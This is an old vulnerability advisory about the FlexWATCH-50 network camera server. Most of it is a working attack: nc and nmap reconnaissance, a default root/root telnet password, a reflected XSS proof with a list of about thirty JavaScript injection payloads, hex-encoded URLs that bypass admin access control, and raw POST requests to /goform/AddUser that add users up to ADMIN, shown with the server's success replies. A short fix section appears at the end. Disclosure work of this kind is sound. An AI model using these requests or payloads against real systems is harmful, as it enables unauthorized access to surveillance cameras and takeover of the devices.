The FlexWATCH surveillance camera server (tested FlexWATCH-50 web ver 2.2 Build Nov 18 2003) is used by many banks and "secure" places and contains remotely exploitable vulnerabilities which allow remote attackers to view camera footage, add users, remove users, change the configuration, disable camera surveillance, cross site scripting, and more.
4934d0e7b56716500ef80132c3567024e4d6fe3186aa10eb1cec0cc51e6eb833
#=============================================================
# Unauthorized Access vulnerability in FlexWATCH camera Server
# Second Assault !
#=============================================================
Author: SLAIZER
mail: slaizer[at]phreaker.net
Vendor : SEYEON Technology
System : FlexWATCH Network Video Server
url : http://www.flexwatch.com/
Mail: sytech@seyeon.co.kr
Protuct Version : FlexWATCH-50 Web Ver 2.2 tested Build Nov 18 2003
#====================
# Introduction
#====================
A few months ago I published another document , explaining how to obtain entire access
to the system of easy and fast form.
The same document was sent to SEYEON before being published , since I did not obtain
response of them , I decided to publish it. Two months after having being published ,
SEYEON got in touch with me. They asked me that test a new system already patched to
the bug , in order that I was saying to them that bugs had found .
They demanded me that it should remove the name of the company of my previus document
and thet he should not publish any more...
In addition to realizing a work to the company with many economic benefits of completely
free form , thing that I do not accept . I will always be ready to help to whom I needed
it from free form where as I'm not demanded anything and much less I use propietary
software. I'm sorry that it seems to be exagerate but nobody lives of the air.
#===================
# Description
#===================
·To examining the new system!
slaizer@Necora:~$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80
HTTP/1.0 302 Redirect
Server: FlexWATCH-Webs <---------- :) the same everlasting banner
Date: Mon Dec 1 01:01:26 2003
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://victim/index.htm
Age: 1
·In another version do not examine the services use , becouse I did not need it :P.
root@Necora:~$ nmap -sS -P0 victim
Interesting ports on victim (censured :P):
PORT STATE SERVICE
21/tcp open ftp <-------
23/tcp open telnet <------- Default user/pass are root/root :P
80/tcp open http <------- They are not also very interesting right now ,
1024/tcp open kdm <------- but with the nice thing that is to use ssl :P.
1755/tcp open wms <-------
·It's time to see web application :
·Sailing along the web we think that the system has changed a bit as for the tree of
directories , but for the rest it seems to be equal .
The first thing what we meet is a bug in the application entrusted to notify to us
that url to which we eant to accede doesn't exist ( 404 error ) , a piece of XSS :P .
Cross-Site Scripting .
Example :
mozilla http://victim/hehe.html<H1><script>alert('Security?');</script>
Results :
Access Error: Page not found
when trying to obtain /hehe.html
cannot open URL /hehe.html
( The code is executed perfectly even two times are executed .. hehe . Turning out
be of that time two windows alerting us with the message -Security ? ).
View source :
<html>
<head>
<title>Document Error: Page not found</title>
</head>
<body>
<h2>Access Error: Page not found</h2>
when trying to obtain <b>/hehe.html<h1><script>alert('Security ?');</script></b>
<br><p>Cannot open URL <b>/hehe.html<h1><script>alert('Security ?');</script></b></p>
</body>
</html>
Note:
This type of methods is well-known to gain access to the system by means of links malicious
to do with the identification of some user .
document.write / document.cookie / document.location..
I expose different methods of injection Javascript extracted of Globbes Security Advisory #33:
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
·There has always to be verified the information that the client sends to the Servant , in this
case the most obvius serious solution to verify that malicious characters are not inserted
as for example substituing to their html equivalent.
------------ u0xa ---------------
·At the moment where I want to come it's to this url : admin/aindex.htm .
That is where one finds the system-administration , so trying and using
imagination I verify that it happens on having sent the request in hexadecimal format.
Example :
slaizer@Necora:~$ ./urlhex.pl http://victim/admin/aindex.htm
------------ Url encode to hex mode ----------------
http://victim/%61%64m%69n/a%69nde%78.%68t%6D
-----------------By SLAIZER tools ------------------
I obtain this in text plain :
------ code -----
<html>
<head>
<script language="Javascript">
onBlur=self.focus()
</script>
<frameset cols="196,*" framespacing="0" frameborder="0">
<frame src="admin.htm" name="menu_frame" id="menu_frame" scrolling="Auto" marginwidth="0" marginheight="0">
<frame src="videocfg.htm" name="main_frame" id="tool_frame" scrolling="Auto" marginwidth="10" marginheight="0">
</frameset>
</head>
</html>
----- code -----
:D It's my friend the frame of configuracion and it's in plain text ..
We go for good way we are going to look if we can do something with this.
slaizer@Necora:~$ ./urlhex.pl http://victim/admin/admin.htm
------------ Url encode to hex mode ----------------
http://victim/adm%69%6E/%61%64%6D%69n.%68tm
-----------------By SLAIZER tools ------------------
Here it is where we go away to centre , so we are going to see it!.
Important links :
_______________________
|-Change Root | <---- /asp/pwdcfg.asp
|Password configuration |
| |
|-Add User | <---- /asp/adduser.asp /* Let's go! */
| |
|-Delete User | <---- /asp/deluser.asp
| |
|-Access Level | <---- /asp/chglimit.asp
|_______________________|
slaizer@Necora:~$ nc victim 80
POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p <----/*This is a /admin/asp/adduser.asp hex-encoded*/
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 152
Pragma: no-cache
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123
&passconf=root123&group=POWER_USER&enabled=on&ok=OK
----------- u0xa ------------
<br>User, "slaizer" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>
----------- u0xa ------------
It seems that there is post correctly , but on having tried login shows us this error directly :
Access Error: Forbidden
When trying to obtain /admin/aindex.htm
Access Denied Prohibited User .
-------------------------------
foh....but ... I login in :
http://victim/app/idxas.html <----- Camera Administration.
Login : slaizer
password: root123
|o_O| <-hehe !! We already have access to all Cameras!!! using the login slaizer with pass root123
that we add in the previous setp. We have already given a great steo improve..
But...The solution is simpler than seems.. the added user belongs to POWER_USER , earlier
having this user really more sufficient , but it is enought to us to done one more test but
add another user to the group of ADMIN :
Example
slaizer@Necora:~$ nc victim 80
POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p <----/*This is a /admin/asp/adduser.asp hex-encoded*/
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 147
Pragma: no-cache
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=rezials&password=123root
&passconf=123root&group=ADMIN&enabled=on&ok=OK
----------- u0xa ------------
<br>User, "rezials" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>
----------- u0xa ------------
At the moment ok! .
I use login rezials & password 123root and..... :D Congratulations! you Are ADMIN!!!
You can already do what you want in the system!!!
The problem was becouse the directory /admin was already not allowin him access to the users as previously
it was happening.
#=========================
# Solution :
#=========================
Always verify the type of request that the client realizes, since you can see I have used a miscellany of
code hexadeciaml and ascii .
The best solution is to create meetings of identification and to allow the access to such directories for
the meeting.
/* Note : login in www.flexwatch.com as technic e-mail suport... xD */
#========================
# GreetSssSss!!!
#========================
- gyorgyo - Makensi - palako - overpower - zapper - sha0 - IaM - phiber - kanutron - TaYoKeN - plAnadeCu -
- kicat - AbeToRiuS - M0RGAN - ZeroQ ...........! xD
[[Irc-Hispano : #boinasnegras , #ngsec]]